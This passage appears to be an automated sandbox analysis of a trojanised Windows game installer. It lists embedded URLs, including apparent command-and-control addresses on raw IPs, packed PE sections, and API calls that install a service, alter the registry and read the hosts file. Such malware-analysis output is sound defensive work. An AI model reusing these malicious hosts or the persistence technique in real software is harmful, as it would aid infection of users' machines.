                  Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.00000000009B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde
                  Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.0000000000927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde
                  Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/
                  Source: crtgame.exe, 00000007.00000002.3291501599.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
                  Source: is-QOSQ7.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-2BNI8.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-9QS5M.tmp.1.dr, is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-H36N8.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-9OEDN.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-RDHKR.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-UJQGJ.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  barindex
                  Source: is-V3CB3.tmp.1.drStatic PE information: section name:
                  Source: is-V3CB3.tmp.1.drStatic PE information: section name:
                  Source: is-82P0C.tmp.1.drStatic PE information: section name:
                  Source: is-82P0C.tmp.1.drStatic PE information: section name:
                  Source: is-SG9N2.tmp.1.drStatic PE information: section name:
                  Source: is-SG9N2.tmp.1.drStatic PE information: section name:
                  Source: is-9QS5M.tmp.1.drStatic PE information: section name:
                  Source: is-0NR14.tmp.1.drStatic PE information: section name:
                  Source: is-0NR14.tmp.1.drStatic PE information: section name:
                  Source: is-HBA5G.tmp.1.drStatic PE information: section name:
                  Source: is-HBA5G.tmp.1.drStatic PE information: section name:
                  Source: is-UT63K.tmp.1.drStatic PE information: section name:
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-O5AH5.tmp.1.drStatic PE information: section name:
                  Source: is-O5AH5.tmp.1.drStatic PE information: section name:
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-H4RQI.tmp.1.drStatic PE information: section name:
                  Source: is-H4RQI.tmp.1.drStatic PE information: section name:
                  Source: is-MSL58.tmp.1.drStatic PE information: section name:
                  Source: is-MSL58.tmp.1.drStatic PE information: section name:
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-MDCMM.tmp.1.drStatic PE information: section name:
                  Source: is-MDCMM.tmp.1.drStatic PE information: section name:
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_03101EE01_2_03101EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_031011401_2_03101140
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_031016B01_2_031016B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004010515_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_00401CBD5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A6B8067_2_02A6B806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A6BE1D7_2_02A6BE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A6BE577_2_02A6BE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A6B85F7_2_02A6B85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A35F147_2_02A35F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A3EA067_2_02A3EA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A548E97_2_02A548E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4E0657_2_02A4E065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A528747_2_02A52874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A499447_2_02A49944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4A6FA7_2_02A4A6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A54E607_2_02A54E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A47F027_2_02A47F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4D7597_2_02A4D759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4DC4D7_2_02A4DC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02A54DF0 appears 137 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02A485A0 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: String function: 00456F08 appears 91 times
                  Source: KRdh0OaXqH.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: KRdh0OaXqH.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: KRdh0OaXqH.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: KRdh0OaXqH.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: KRdh0OaXqH.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-4K1KF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-4K1KF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-4K1KF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-4K1KF.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SpaceXRaces.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-2Q15C.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-UJQGJ.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-9OEDN.tmp.1.drStatic PE information: Number of sections : 18 > 10
                  Source: is-CJ9O9.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-MB554.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-PQ8T3.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-2BNI8.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs KRdh0OaXqH.exe
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs KRdh0OaXqH.exe
                  Source: KRdh0OaXqH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SpaceXRaces.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-V3CB3.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-HBA5G.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-3PB3G.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-O5AH5.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-MSL58.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-BLG4U.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-RUH59.tmp.1.drBinary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@15/128@7/3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A402C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,7_2_02A402C0
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455328
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00402548
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0046D118 GetVersion,CoCreateInstance,1_2_0046D118
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeFile created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmpJump to behavior
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-9OEDN.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-9OEDN.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-9OEDN.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-9OEDN.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-9OEDN.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-9OEDN.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-9OEDN.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-9OEDN.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-9OEDN.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: KRdh0OaXqH.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeFile read: C:\Users\user\Desktop\KRdh0OaXqH.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\KRdh0OaXqH.exe "C:\Users\user\Desktop\KRdh0OaXqH.exe"
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp "C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe"
